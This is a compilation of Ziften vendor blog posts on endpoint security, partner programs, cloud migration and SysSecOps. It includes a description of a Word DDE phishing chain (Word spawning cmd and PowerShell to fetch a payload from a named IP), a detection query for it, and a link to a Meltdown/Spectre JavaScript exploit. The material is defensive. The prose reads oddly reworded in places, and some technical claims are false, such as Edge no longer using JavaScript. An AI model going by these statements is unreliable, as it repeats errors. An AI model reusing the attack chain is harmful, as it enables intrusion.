Chuck Leaver – The Improved Ziften Channel Program

Written By Greg McCreight And Presented By Chuck Leaver

 

If you are a reseller, integrator, distributor, managed service provider – the brand-new Ziften Activate Partner Program is here, it’s ready to go, and will be terrific for your profitability (and for reducing your customers’ stress and anxiety about cybersecurity).

Ziften is 100 percent dedicated to the channel, and as we grow and progress in the market, we understand that your success is our success – and also our success is your success. And it shows: 96 percent of our sales in 2017 were through the channel! That’s why we built the new Activate Partner Program to provide you the resources you need to grow your organization with Ziften security services.

We kicked it all off with a very effective, cross-platform Endpoint Detection and Response (EDR) solution, Ziften Zenith. Customers really love it. Innovation Partners really love it. Resellers really love it. The market loves it. And analysts love it.

I have to share this from the conclusion of our broadband testing report, which discusses SysSecOps, or Systems Security Operations – an emerging classification where Ziften is a market leader:

Critical to Ziften’s endpoint technique in this category is total visibility – let’s face it, how can you secure if you cannot see or have no idea what is there in the first place? With its Zenith platform, Ziften has a solution that ticks all the SysSecOps boxes and more …

Overall, Ziften has a really competitive offering in the extremely legitimate, emerging IT category in the form of SysSecOps and one that should be on the examination short-list.

By the way: Microsoft recently partnered with Ziften to produce an integration of Zenith and Microsoft Windows Defender ATP, to permit Microsoft customers to secure Linux and Mac systems with the exact same single pane of glass as they use to secure Windows systems.

Enough about Ziften. Let’s concentrate on you. How you will benefit with the Activate Partner Program.

We have actually assembled a multi-tier partner program that has improved discount rates, more resources, and strong market advancement support. We understand a one-size-fits-all program does not work, not in the market today.

With Activate, we take a hands-on stance to onboarding brand-new partners; making it simple for those for whom security is a relatively small part of your services; and rewarding top-tier partners who have actually committed to Ziften.

Here’s what you get with the Activate Partner Program – and we’ll work with you to make sure that Activate fits your requirements perfectly:

Security for more of your consumer’s environment – endpoints, servers, and the cloud

Visibility and security for your client’s complex, multi-cloud deployments

Simple security tool integrations to provide genuinely custom, differentiated solutions

Hands-on, personalized assistance and life-cycle know-how

Rich financial rewards that encourage your long-term financial investment and reward on-going success

Market advancement support to drive incremental need and list building

First-rate, hands on assistance from our field sales, sales engineers, technical support, and marketing experts

The Activate program combines our effective security services, financial investments, and hands on assistance to help you develop more opportunity and close more deals.

Chuck Leaver – Be Prepared For Migrating Assets To The Cloud

Written By Logan Gilbert And Presented By Chuck Leaver

 

It bears reiterating – the Internet has actually permanently altered the world for individuals and companies alike. When it comes to the latter, every element of modern IT is undergoing digital change. IT departments everywhere are under pressure to make information extremely available and at lower expense – all while protecting critical data from corruption, leakage, or cyber theft.

Central to this strategy is the migration of data centers to the cloud. In fact, nineteen percent of company workloads are anticipated to be in the general public cloud by the end of 2019, and 50% over the next ten years.

Exactly What is Cloud Asset Migration?

Cloud migration is the process of moving data, applications or other service components from a company’s on-premise infrastructure to the cloud or moving them from one cloud service to another.

The diagram shown below illustrates this migration of file-server(s), data, and application(s) from an on premise server infrastructure to a cloud environment.

Cloud service providers make it possible for companies to move some or all IT infrastructure to the cloud for scale, speed, service flexibility, ease of management, and lowered costs. The advantages are absolutely nothing except compelling.

Utilizing Cloud Computing is changing the corporate landscape. With the technological developments, individuals are leaning more towards a virtual workplace meaning that you can work from anywhere and anytime making use of cloud computing.

Cloud Asset Migration Considerations

But, similar to any considerable IT infrastructure change, a relocate to the cloud requires thoughtful planning and execution for the procedure to occur within the budget plan and on time. Moving a server, database, application, or all of the above to the cloud is not without threat. System outages, performance degradation, data loss and more are likely to happen as a result of misconfigurations, system failures, and security exploits.

Case in point: 43% of those who have actually gone through a cloud asset migration have actually experienced a failed or delayed application. Why? Due to the fact that each asset migration is a ‘snowflake’ with its own level of complexity.

Let’s look at three aspects to think about for effective cloud asset migration.

1. Have a Plan

First, there has to be a strategic migration strategy. That plan needs to assist respond to concerns like the following:

Which IT assets should be migrated in the first place?
If you are moving some, or all, of your infrastructure to the cloud, how will you develop and preserve asset control?
How will you inventory what you have – before and after the move?
Do you even have to move all of it?
What comes first?

2. Clean Up Exactly What remains in Place Today

To answer these strategic questions successfully, you’ll require definitive visibility into each asset under roof now, along with appropriate characteristics of each asset. Whether your assets today are running on physical or virtual server infrastructure, you need to understand:

What assets are there now? Discover all the connected assets and comprehend whether they are currently handled and unmanaged.
Recognize low usage and/or unused systems. Should these systems be eliminated or repurposed prior to migration?
Recognize low usage and/or unused applications. Are these applications needed at all? Should they be gotten rid of prior to migration?
Determine and tidy up aspects of duplication, be it systems and/or applications.
Now identify those business-critical systems and applications that will now be migrated as part of your plan. With this detailed asset data in hand, you can sharpen your migration method by segmenting exactly what should – and ought to not be migrated – or at least clearly prioritize based upon business significance.

3. Prepare For Cloud Visibility Post Migration

Now that you’re equipped with thorough, precise existing and historical asset data, how will you preserve this level of visibility after your successful cloud asset migration?

While the expense benefits of moving to the cloud are often incredibly compelling, uncontrolled asset/ virtual machine proliferation can quickly wear down those cost benefits. So, before performing your cloud asset migration, ensure you have a cloud visibility service in place that:

Discovers/ monitors all connected assets throughout your single or multi-cloud environment
Inventories, fingerprints, and categorizes found assets
Alerts on new or unanticipated asset discovery and/or habits within the cloud environment
Incorporates with existing ticketing, workflow, and/or CMDB systems

Cloud Visibility and Security with Ziften

Continuous cloud visibility into each device, user, and application means you can administer all parts of your infrastructure more effectively. You’ll avoid squandering resources by preventing VM expansion, plus you’ll have an in-depth body of data to satisfy audit requirements for NIST 800-53, HIPAA, and other compliance regulations.

Follow the above when you migrate to the cloud, and you’ll stay away from weak security, incomplete compliance, or functional SNAFUs. Ziften’s method to cloud visibility and security offers you the intelligence you need for cloud asset migration without the difficulties.

Chuck Leaver – Great Security Opportunity For Microsoft Channel Partners

Written By Greg McCreight And Presented By Chuck Leaver

 

Windows Defender Advanced Threat Protection (WDATP) is very good, popular with Microsoft channel partners around the world. It is probable that you’re currently dealing with Microsoft clients to set up and look after WDATP on their Windows end points.

I’m thrilled to tell you about a new opportunity: Get a fast start with an industry-leading service that integrates right into WDATP: Ziften Zenith. For a restricted time, Microsoft channel partners can utilize our brand-new “Fast Start” program to collaborate with Ziften.

With “Fast Start,” you delight in all the benefits of Ziften’s leading tier partner status for a complete year, and we’ll assist you to get up and running quickly with joint market and business advancement resources – and with a waiver of the usual sales volume dedication related to Gold Status.

If you do not know Ziften, we provide infrastructure visibility and collaborated risk detection, prevention, and response across all endpoint devices and cloud environments. Zenith, our flagship security platform, easily deploys to client devices, servers, and virtual machines.

Once installed, Zenith continuously collects all the info essential to properly assess the existing and historic state of all handled devices including system, user habits, network connection, application, binary, and procedure data. Zenith offers your clients’ IT and security teams with constant visibility and control of all managed assets including continuous monitoring, alerting, and automated or manual actions.

Zenith is cross-platform – it operates with and safeguards Windows, Mac, Linux, and other end points.

What’s specifically notable – and here’s the chance – is that Ziften has worked together with Microsoft to incorporate Zenith with Windows Defender ATP. That suggests your customers can utilize WDATP on Windows systems and Zenith on their macOS and Linux systems to discover, view, and respond to cyberattacks all using just the WDATP Management Console for all the systems. Zenith is hidden in the background.

A single pane of glass, to handle Windows, Mac, Linux endpoints, which can consist of desktops, notebooks, and servers. That makes Zenith an ideal solution to provide to your existing WDATP clients… and to make your bids for new WDATP business more comprehensive for multi-platform business potential customers.

Furthermore, offering Zenith can assist you speed client migrations to Windows 10, and offer more Business E5 commercial editions.

” Fast Start” with Gold Status for a Year

Ziften is absolutely concentrated on the channel: 96% of our sales in 2017 were through the channel. We are delighted to bring the “Fast Start” program to existing Microsoft channel partners, anywhere in the world.

With “Fast Start,” you can sign up for the Ziften Channel Program with these advantages:

Expedited Approval and On-Boarding – Ziften channel managers and field sales work directly with you to get operating providing the Zenith endpoint security service integrated with Windows Defender ATP.

Superior Security Value – You’ll be uniquely positioned to provide clients and potential customers higher security worth throughout more of their overall environment than ever, increasing the variety of supported and secured Windows, Mac, and Linux systems.

Hands-On Collaboration – Ziften dedicates field sales, sales engineers, and marketing to support your daily pre-sales engagements, drive brand-new sales opportunities, and assist to close more deals with Microsoft and Ziften endpoint security.

Here’s what one major Microsoft channel partner, states about this – this is Ronnie Altit, creator and CEO of Insentra, a “partner-obsessed” Australian IT services company that works solely through the IT channel:

” As a large Microsoft reseller, teaming with Ziften to provide their Zenith security platform integrated with Microsoft Windows Defender ATP was a no-brainer. We’re thrilled at the seamless integration between Zenith and Windows Defender ATP giving our customers holistic protection and visibility throughout their Windows and non-Windows systems. Ziften has actually been a pleasure to work with, and helpful at every step of the procedure. We expect to be exceptionally successful offering this powerful security service to our clients.”

Chuck Leaver – The Girl Scouts Are Raising The Profile Of Women In Cybersecurity

Written By Kim Foster And Presented By Chuck Leaver

 

It’s clear that cybersecurity is getting more international attention than before, and businesses are rightfully worried if they are training sufficient security specialists to fulfill growing security dangers. While this issue is felt across the commercial world, numerous people did not anticipate Girl Scouts to hear the call.

Beginning this fall, countless Girl Scouts nationwide have the chance to receive cybersecurity badges. Girl Scouts of the U.S.A teamed up with Security Company (and Ziften tech partner) Palo Alto Networks to create a curriculum that informs girls about the essentials of computer system security. In accordance with Sylvia Acevedo, CEO of GSUSA, they developed the program based upon need from the ladies themselves to safeguard themselves, their computers, and their household networks.

The timing is good, given that in accordance with a study launched in 2017 by (ISC), 1.8 million cybersecurity positions will be unfilled by 2022. Combine increased need for security pros with stagnant growth for females – only 11 percent for the past several years – our cybersecurity staffing difficulties are poised to get worse without significant effort on behalf of the industry for better inclusion.

Obviously, we can’t rely on the Girl Scouts to do all of the heavy lifting. Broader educational efforts are a given: according to the Computing Technology Industry Association, 69% of U.S. ladies who do not have a career in infotech pointed out not knowing exactly what chances were readily available to them as the reason they did not pursue one. One of the great untapped chances of our market is the recruitment of more diverse specialists. Targeted educational programs and increased awareness must be high concern. Raytheon’s Ladies Cyber Security Scholarship is a fine example.

To gain the rewards of having women invested in shaping the future of technology, it is very important to dispel the exclusionary understanding of “the boys’ club” and keep in mind the groundbreaking contributions made by females of the past. Numerous folk know that the very first computer system developer was a female – Ada Lovelace. Then there is the work of other well-known leaders such as Grace Hopper, Hedy Lamarr, or Ida Rhodes, all who may stimulate some vague recollection among those in our market. Female mathematicians produced programs for one of the world’s first fully electronic general-purpose computers: Kay McNulty, Jean Jennings Bartik, Betty Snyder, Marlyn Meltzer, Fran Bilas, and Ruth Lichterman were simply a few of the initial developers of the Electronic Numerical Integrator and Computer system (better known as ENIAC), though their important work was not commonly recognized for over half a century. In fact, when historians initially discovered photos of the ladies in the mid-1980s, they misinterpreted them for “Refrigerator Ladies” – models posing in front of the machines.

It’s worth noting that many think the same “boys’ club” mentality that neglected the accomplishments of women in history has led to restricted leadership positions and lower wages for contemporary women in cybersecurity, along with outright exclusion of female stars from speaking chances at market conferences. As trends go, excluding brilliant people with suitable knowledge from affecting the cybersecurity market is an unsustainable one if we wish to stay up to date with the bad guys.

Whether or not we jointly take action to promote more inclusive offices – like informing, hiring, and promoting females in larger numbers – it is heartening to see an organization synonymous with fundraising event cookies successfully alert an entire industry to the fact that girls are really interested in the field. As the Girls Scouts these days are offered the tools to pursue a profession in info security, we must expect that they will become the very ladies who eventually reprogram our expectations of what a cybersecurity professional appears like.

Chuck Leaver – A Mac Is A Security Risk Too

Written By Roark Pollock And Presented By Chuck Leaver

 

Got Macs? Great. I have one too. Have you locked your Macs down? If not, your enterprise has a possibly major security weak point.

It’s a misconception to believe that Macintosh computer systems are inherently protected and don’t need to be protected against malware or hacking. Many believe Macs are certainly arguably more protected than Windows desktops and notebooks, due to the style of the Unix-oriented kernel. Definitely, we see less security patches issued for macOS from Apple, compared to security patches for Windows from Microsoft.

Fewer security defects is not absolutely no problems. And safer doesn’t imply 100% safe.

Some Mac Vulnerability Examples

Take, for example, the macOS 10.13.3 update, released on January 23, 2018, for the current versions of the Mac’s operating system. Like a lot of present computer systems running Intel processors, the Mac was susceptible to the Meltdown flaw, which indicated that harmful applications may be able to check out kernel memory.

Apple needed to patch this defect – as well as numerous others.

For instance, another problem could allow harmful audio files to carry out random code, which might break the system’s security integrity. Apple had to patch it.

A kernel flaw meant that a harmful application may be able to execute random code with kernel opportunities, giving hackers access to anything on the device. Apple needed to patch the kernel.

A defect in the WebKit library indicated that processing maliciously crafted web content may result in arbitrary code execution. Apple had to patch WebKit.

Another defect suggested that processing a malicious text message may result in application denial of service, freezing the system. Whoops. Apple had to patch that flaw also.

Don’t Make The Same Errors as Customers

Numerous consumers, believing all the hype about how wonderful macOS is, opt to run without defense, relying on the macOS and its integrated application firewall program to block all manner of bad code. Bad news: There’s no integrated anti virus or anti malware, and the firewall program can just do so much. And lots of businesses wish to overlook macOS when it comes to visibility for posture tracking and hardening, and hazard detection/ risk hunting.

Consumers frequently make these assumptions because they do not know any better. IT and Security experts ought to never ever make the very same mistakes – we must know much better.

If a Mac user sets up bad software applications, or adds a malicious browser extension, or opens a bad email attachment, or clicks a phishing link or a nasty ad, their machine is corrupted – much like a Windows computer. However within the enterprise, we need to be prepared to handle these issues, even with Mac computers.

What To Do?

What do you need to do?

– Set up anti-virus and anti malware on corporate Mac computers – or any Mac that has access to your organization’s material, servers, or networks.
– Track the state of Macs, much like you would with Windows computers.
– Be proactive in applying patches and fixes to Mac computers, again, much like with Windows.

You must also eliminate Macs from your corporate environment which are old and cannot run the most recent variation of macOS. That’s a lot of them, since Apple is pretty good at keeping old hardware. Here is Apple’s list of Mac models that can run macOS 10.13:

– MacBook (Late 2009 or newer).
– MacBook Pro (Mid 2010 or more recent).
– MacBook Air (Late 2010 or more recent).
– Mac mini (Mid 2010 or newer).
– iMac (Late 2009 or newer).
– Mac Pro (Mid 2010 or newer).

When the next version of macOS comes out, some of your older devices might fall off the list. They ought to fall off your inventory as well.

Ziften’s Perspective.

At Ziften, with our Zenith security platform, we strive to preserve visibility and security feature parity between Windows systems, macOS systems, and Linux-based systems.

In fact, we have actually partnered with Microsoft to incorporate our Zenith security platform with Microsoft Windows Defender Advanced Threat Protection (ATP) for macOS and Linux tracking and threat detection and response coverage. The integration makes it possible for customers to detect, see, investigate, and respond to advanced cyber-attacks on macOS computers (as well as Windows and Linux-based endpoints) straight within the Microsoft WDATP Management Console.

From our perspective, it has actually always been very important to offer your security teams confidence that every desktop/ laptop endpoint is safeguarded – and therefore, the enterprise is protected.

It can be hard to believe, 91% of businesses state they have some Mac computers. If those computers aren’t safeguarded, and also appropriately incorporated into your endpoint security systems, the enterprise is not secured. It’s just that basic.

Chuck Leaver – The Advantages Of The Security Industry Working Together

Written By Chuck Leaver

No one can solve cybersecurity alone. No single solution company, no single provider, no one can take on the whole thing. To tackle security needs cooperation between different companies.

In some cases, those players are at various levels of the service stack – some install on endpoints, some within applications, others within network routers, others at the telco or the cloud.

Sometimes, those companies each have a particular best-of-breed piece of the puzzle: one player focuses on e-mail, others in crypto, others in interrupting the kill chain.

From the enterprise consumer’s point of view, effective security needs assembling a set of tools and services into a working whole. Speaking from the suppliers’ viewpoint, efficient security requires tactical alliances. Sure, each vendor, whether making hardware, writing software applications, or using services, has its own products and intellectual property. Nevertheless, we all work better when we work together, to allow integrations and make life easy for our resellers, our integrators- and the end client.

Paradoxically, not only can suppliers make more money through strategic alliances, but end customers will save profits at the same time. Why? A number of factors.

Consumers do not waste their cash (and time) with products which have overlapping abilities. Clients do not need to lose cash (and time) creating custom integrations. And customers won’t squander money (and time) aiming to debug systems that combat each other, such as by triggering additional notifications or hard to find incompatibilities.

The Ultimate Trifecta – Products, Solutions, and Channels

All three work together to meet the needs of the business client, as well as benefit the suppliers, who can concentrate on doing exactly what they do best, relying on strategic alliances to develop total solutions from jigsaw puzzle pieces.

Usually speaking, those services require more than simple APIs – which is where strategic alliances come in.

Think about the integration in between solutions (like a network danger scanner or Ziften’s endpoint visibility services) and analytics options. End clients don’t wish to run a whole load of different control panels, and they don’t want to by hand associate anomaly findings from a lot of different security tools. Strategic alliances in between product suppliers and analytics solutions – whether on-site or in the cloud – make good sense for everybody. That includes for the channel, who can offer and support total services that are already dialed in, already debugged, already documented, and will work with the least hassle possible.

Or think about the integration of solutions and managed security services providers (MSSPs). They wish to offer prospective clients pre-packaged options, ideally which can run in their multi-tenant clouds. That means that the items need to be scalable, with synergistic license terms. They must be well-integrated with the MSSP’s existing control panels and administrative control systems. And naturally, they have to feed into predictive analytics and occurrence response programs. The very best way to do that? Through tactical alliances, both horizontally with other solution vendors, and with significant MSSPs also.

How about major value add resellers (VAR)? VARs require solutions that are simple to understand, easy to support, and easy to add into existing security deployments. This makes brand-new solutions more attractive, more cost effective, simpler to set up, much easier to support – and strengthen the VAR’s client relationships.

Exactly what do they try to find when adding to their solution portfolio? Brand-new products that have tactical alliances with their existing product offerings. If you do not dovetail in to the VAR’s portfolio partners, well, you probably don’t dovetail.

2 Examples: Fortinet and Microsoft

No one can resolve cybersecurity alone, and that includes giants like Fortinet and Microsoft.

Think About the Fortinet Fabric-Ready Partner Program, where innovation alliance partners integrate with the Fortinet Security Fabric by means of Fabric APIs and have the ability to actively collect and share info to enhance threat intelligence, boost general hazard awareness, and widen hazard response from end to end. As Fortinet discusses in their Fortinet Fabric-Ready Partner Program Introduction, “partner inclusion in the program signals to customers and the industry as a whole that the partner has actually teamed up with Fortinet and leveraged the Fortinet Fabric APIs to develop verified, end-to-end security options.”

Likewise, Microsoft is pursuing a similar technique with the Windows Defender Advanced Threat Protection program. Microsoft recently picked just a couple of crucial partners into this security program, saying, “We’ve spoken with our customers that they desire protection and visibility into possible hazards on all their device platforms and we’ve relied on partners to assist address this need. Windows Defender ATP provides security groups a single pane of glass for their endpoint security and now by working together with these partners, our customers can extend their ATP service to their entire install base.”

We’re the first to confess: Ziften cannot resolve security alone. No one can. The best way forward for the security market is to move forward together, through tactical alliances combining item vendors, service companies, and the channel. That way, we all win, vendors, service providers, channel partners, and business customers alike.

Chuck Leaver – Why You Must Have Flexibility With SysSecOps

Written by Chuck Leaver

 

You will discover that endpoints are everywhere. The device you read this on is an endpoint, whether it’s a desktop, notebook, tablet, or phone. The HEATING AND COOLING controller for your structure is an endpoint, assuming it’s linked to a network, and the WiFi access points and the security cams too. So is the linked vehicle. So are the Web servers, storage servers, and Active Directory servers in the data center. So are your IaaS/PaaS services in the cloud, where you are in control of bare-metal servers, VMware virtual machines, or containers working on Windows and/or Linux.

All of them are endpoints, and each and every one is very important to manage.

They have to be handled from the IT side (from IT administrators, who ideally have appropriate IT-level visibility of each connected thing like those security cams). That management means making sure they’re connected to the right network zones or VLANs, that their software and setups are up to date, that they’re not creating a flood on the network with bad packets due to electrical faults and so-on.

Those endpoints also need to be handled from the security perspective by CISO teams. Every endpoint is a prospective entrance into the business network, which indicates the devices should be locked down – default passwords never used, all security patches used, no unapproved software set up on the device’s embedded web server. (Kreb’s outlines how, in 2014, hackers got into Target’s network via its HVAC system.).

Systems and Security Operations.

Systems Security Operations, or SysSecOps, brings those two worlds together. With the best kind of SysSecOps frame of mind, and tools that support the correct workflows, IT and security workers get the exact same data and can collaborate together. Sure, they each have various tasks, and react differently to problem signals, however they’re all managing the same endpoints, whether in the pocket, on the desk, in the energy closet, in the data center, or in the cloud.

Ziften Zenith Test Report.

We were thrilled when the just recently released Broadband-Testing report applauded Zenith, Ziften’s flagship endpoint security and management platform, as being perfect for this kind of situation. To quote from the recent report, “With its Zenith platform, Ziften has a solution that ticks all the SysSecOps boxes and more. Because its meaning of ‘endpoints’ extends into the Data Centre (DC) and the world of virtualisation, it holds true blanket protection.”.

Broadband-Testing is an independent testing facility and service based in Andorra. They explain themselves as, “Broadband-Testing communicates with suppliers, media, investment groups and VCs, experts and consultancies alike. Testing covers all elements of networking hardware and software, from ease of use and performance, through to progressively important aspects such as device power intake measurement.”

Back to flexibility. With endpoints all over (once again, on the desk, in the energy closet, in the data center, or in the cloud), a SysSecOps-based endpoint security and management system should go everywhere and do anything, at scale. Broadband-Testing wrote:

“The configuration/deployment options and architecture of Ziften Zenith permit a really flexible implementation, on or off-premise, or hybrid. Agent deployment is simpleness itself with zero user requirements and no endpoint invasion. Agent footprint is also very little, unlike numerous endpoint security services. Scalability also looks to be excellent – the most significant customer implementation to this day remains in excess of 110,000 endpoints.”

We cannot help but be proud of our product Zenith, and exactly what Broadband-Testing concluded:

“The introduction of SysSecOps – integrating systems and security operations – is an uncommon moment in IT; a hype-free, sound judgment approach to refocusing on how systems and security are managed inside a business.

Key to Ziften’s endpoint technique in this category is total visibility – after all, how can you protect what you can’t see or do not know exists in the first place? With its Zenith platform, Ziften has a product that ticks all the SysSecOps boxes and more.

Deployment is simple, specifically in a cloud-based situation as evaluated. Scalability also looks to be excellent – the most significant customer implementation to this day is in excess of 110,000 endpoints.

Data analysis options are comprehensive with a huge quantity of info offered from the Ziften console – a single view of the whole endpoint infrastructure. Any object can be analysed – e.g. Binaries, applications, systems – and, from a procedure, an action can be defined as an automated function, such as quarantining a system in case of a possibly harmful binary being found. Several reports are predefined covering all aspects of analysis. Alerts may be set for any occurrence. Furthermore, Ziften provides the principle of extensions for customized data collection, beyond the reach of a lot of vendors.

And with its External API performance, endpoint data gathered by Ziften can be shared with most third party applications, thus including more worth to a client’s existing security and analytics infrastructure investment.

Overall, Ziften has an extremely competitive offering in what is a really worthwhile and emerging IT classification through SysSecOps that is extremely deserving of evaluation.”.

We hope you’ll think about an assessment of Zenith, and will concur that when it concerns SysSecOps and endpoint security and management, we do tick all the boxes with the true blanket coverage that both your IT and CISO teams have actually been looking for.

Chuck Leaver – Ziften Can Assist With Meltdown And Spectre

Written By Josh Harriman And Presented By Chuck Leaver

 

Ziften is aware of the latest exploits impacting practically everyone who deals with a computer system or digital device. While this is a very large statement, we at Ziften are working diligently assisting our clients find susceptible assets, repairing those vulnerable systems, and keeping an eye on systems after the repair for prospective performance concerns.

This is an ongoing investigation by our group in Ziften Labs, where we keep up to date on the most recent harmful attacks as they develop. Today, the majority of the conversations are around PoC code (Proof of Concept) and exactly what can in theory take place. This will quickly change as hackers benefit from these opportunities. The exploits I’m speaking, of course, are Meltdown and Spectre.

Much has actually been written about how these exploits were found and exactly what is being done by the market to discover workarounds to these hardware concerns. To get more information, I feel it’s appropriate to go right to the source here (https://spectreattack.com/).

What Do You Need To Do, and How Can Ziften Help?

A key area that Ziften helps with in case of an attack by either method is keeping track of for data exfiltration. Given that these attacks are essentially taking data they should not have access to, our company believe the first and simplest techniques to protect yourself is to take this confidential data and remove it from these systems. This data might be passwords, login qualifications or perhaps security keys for SSH or VPN access.

Ziften checks and alerts when processes that typically do not make network connections begin showing this uncommon behavior. From these notifications, users can quarantine systems from the network and / or eliminate procedures connected with these circumstances. Ziften Labs is keeping an eye on the development of the attacks that are likely to become readily available in the real world related to these vulnerabilities, so we can better safeguard our consumers.

Discover – How am I Susceptible?

Let’s look at areas we can monitor for susceptible systems. Zenith, Ziften’s flagship product, can easily and quickly find Operating Systems that need to be patched. Although these exploits remain in the CPU chips themselves (Intel, AMD and ARM), the repairs that will be available will be upgraded to the Operating System, and in other cases, the web browser you use as well.

In Figure 1 below, you can see one example of how we report on the readily available patches by name, and what systems have actually successfully installed each patch, and which have yet to set up. We can also track patch installs that stopped working. The example shown below is not for Meltdown or Spectre, however the KB and / or patch number for the environment could be populated on this report to reveal the vulnerable systems.

The same is true for browser updates. Zenith keeps an eye out for software application variations running in the environment. That data can be utilized to comprehend if all browsers are up to date once the fixes appear.

Speaking of internet browsers, one area that has actually already picked up steam in the attack scenarios is utilizing Javascript. A working copy is shown here (https://www.react-etc.net/entry/exploiting-speculative-execution-meltdown-spectre-via-javascript).

Products like Edge browsers do not use Javascript any longer and mitigations are readily available for other web browsers. Firefox has a fix offered here (https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/). A Chrome fix is coming out soon.

Fix – Exactly What Can I Do Now?

Once you have actually recognized susceptible systems in your environment you certainly want to patch and repair them as soon as possible. Some safeguards you have to take into consideration are reports of specific Anti-Virus products causing stability issues when the patches are applied. Details about these problems are here (https://www.cyberscoop.com/spectre-meltdown-microsoft-anti-virus-bsod/) and here (https://docs.google.com/spreadsheets/u/1/d/184wcDt9I9TUNFFbsAVLpzAtckQxYiuirADzf3cL42FQ/htmlview?usp=sharing&sle=true).

Zenith also has the ability to help patch systems. We can monitor for systems that require patches, and direct our solution to apply those patches for you and then report success / failure and the status of those still requiring patching.

Considering that the Zenith backend is cloud-based, we can even track your endpoint systems and use the needed patches when and if they are not linked to your business network.

Track – How is it all Running?

Last but not least, there could be some systems that exhibit performance degradation after the OS repairs are applied. These problems seem to be restricted to high load (IO and network) systems. The Zenith platform assists both security and operational groups within your environment. What we want to call SysSecOps (https://ziften.com/introducing-systems-security-operations-syssecops/).

We can help reveal issues such as hangs or crashes of applications, and system crashes. Plus, we monitor system usage for Memory and CPU gradually. This data can be utilized to monitor and notify on systems that start to exhibit high usage compared with the period prior to the patch was used. An example of this tracking is shown in Figure 2 below (system names deliberately removed).

These ‘defects’ are still new to the public, and far more will be gone over and discovered for days / weeks / months to come. Here at Ziften, we continue to monitor the circumstance and how we can best educate and secure our clients and partners.

Chuck Leaver – Why You Need SysSecOps

Written By Alan Zeichick And Presented By Chuck Leaver

 

SysSecOps. That’s a new phrase, still unseen by many IT and security administrators – however it’s being discussed within the market, by analysts, and at technical conferences. SysSecOps, or Systems & Security Operations, describes the practice of combining security groups and IT operations groups to be able to make sure the health of enterprise technology – and having the tools to be able to respond most effectively when issues happen.

SysSecOps concentrates on taking down the info walls, disrupting the silos, that get between security groups and IT administrators.

IT operations personnel are there to make sure that end-users can access applications, and that important infrastructure is running at all times. They want to optimize access and availability, and require the data required to do that job – like that a new employee needs to be provisioned, or a hard disk drive in a RAID array has actually stopped working, that a new partner needs to be provisioned with access to a secure document repository, or that an Oracle database is ready to be moved to the cloud. It’s everything about innovation to drive business.

Very Same Data, Various Use-Cases

While using endpoint and network monitoring details and analytics are clearly customized to fit the diverse needs of IT and security, it ends up that the underlying raw data is in fact the exact same. The IT and security groups simply are looking at their own domain’s issues and scenarios – and doing something about it based upon those use-cases.

Yet in some cases the IT and security groups have to interact. Like provisioning that brand-new organization partner: It must touch all the ideal systems, and be done securely. Or if there is a problem with a remote endpoint, such as a mobile phone or a mechanism on the Industrial Internet of Things, IT and security might have to work together to identify exactly what’s going on. When IT and security share the exact same data sources, and have access to the very same tools, this job becomes a lot easier – and hence SysSecOps.

Envision that an IT administrator spots that a server hard drive is nearing full capacity – and this was not anticipated. Perhaps the network had actually been breached, and the server is now being utilized to steam pirated films throughout the Web. It happens, and finding and resolving that issue is a task for both IT and security. The data gathered by endpoint instrumentation, and showed through a SysSecOps-ready tracking platform, can assist both sides working together more effectively than would happen with conventional, distinct, IT and security tools.

SysSecOps: It’s a brand-new term, and a brand-new idea, and it’s resonating with both IT and security groups. You can discover more about this in a brief 9 minute video, where I talk with numerous market specialists about this subject: “Exactly what is SysSecOps?”

Chuck Leaver – Be Careful Of This Microsoft Word Feature And Phishing Attacks

Written By Josh Harriman And Presented By Chuck Leaver

 

An intriguing multifaceted attack has been reported in a current blog by Cisco’s Talos
Intelligence group. I wanted to speak about the infection vector of this attack as it’s quite
fascinating and something that Microsoft has actually pledged not to repair, as it is a feature
and not a bug. Reports are can be found about attacks in the wild which are making use of a
feature in Microsoft Word, called Dynamic Data Exchange (DDE). Details to how this is
accomplished are reported in this blog from SecureData.

Special Phishing Attack with Microsoft Word

Attackers constantly search for brand-new methods to breach a company. Phishing attacks are one
of the most typical as assailants are relying on that someone will either open a document sent
out to them or go to a ‘faked’ URL. From there an exploit on a susceptible piece of software
usually provides access to begin their attack.

However in this case, the documents didn’t have a malicious item embedded in the Word doc,
which is a preferred attack vector, but rather a sly way of utilizing this function that
permits the Word program to connect out to obtain the real malicious files. By doing this they
could hope or rely on a better success rate of infection as harmful Word files themselves can
be scanned and erased prior to reaching the recipient.

Hunting for Suspicious Behaviors with Ziften Zenith

Here at Ziften, we wanted to have the ability to alert on this behavior for our clients.
Finding conditions that show ‘odd’ habits such as Microsoft Word spawning a shell is
fascinating and not expected. Taking it further on and trying to find PowerShell running from
that spawned shell and it gets ‘extremely’ intriguing. Through our Search API, we can discover
these behaviors anytime they happened. We do not need the system to be switched on at the time
of the search, if they have actually run a program (in this case Word) that exhibited these
behaviors, we can discover that system. Ziften is constantly gathering and sending appropriate
procedure info which is why we can discover the data without depending on the system state at
the time of searching.

In our Zenith console, I looked for this condition by looking for the following:

Process → Filepath includes word.exe, Child Process Filepath includes cmd.exe, Child Process
commandline includes powershell

This returns the PIDs (Process ID) of the processes we saw startup with these conditions. After
this we can drill down to see the critical information.

In this very first image, we can see details around the procedure tree (Word spawning CMD with
Powershell under that) on the left, and to the right side you can see details like the System
name and User, plus start time.

Below in the next image, we take a look at the CMD procedure and get details regarding what was
passed to Powershell.

Most likely when the user had to answer this Microsoft Word pop up dialog box, that is when the
CMD shell used Powershell to head out and obtain some code that was hosted on the Louisiana Gov
website. In the Powershell image below we can see more details such as Network Connect info
when it was reaching out to the website to pull the fonts.txt file.

That IP address (206.218.181.46) is in fact the Louisiana Gov website. Often we see fascinating
data within our Network Connect information that might not match exactly what you expect.

After developing our Saved Search, we can inform on these conditions as they occur throughout
the environment. We can likewise develop extensions that alter a GPO policy to not allow DDE or
even take additional action and go and discover these files and remove them from the system if
so wanted. Having the ability to find fascinating mixes of conditions within an environment is
extremely effective and we are delighted to have this function in our offering.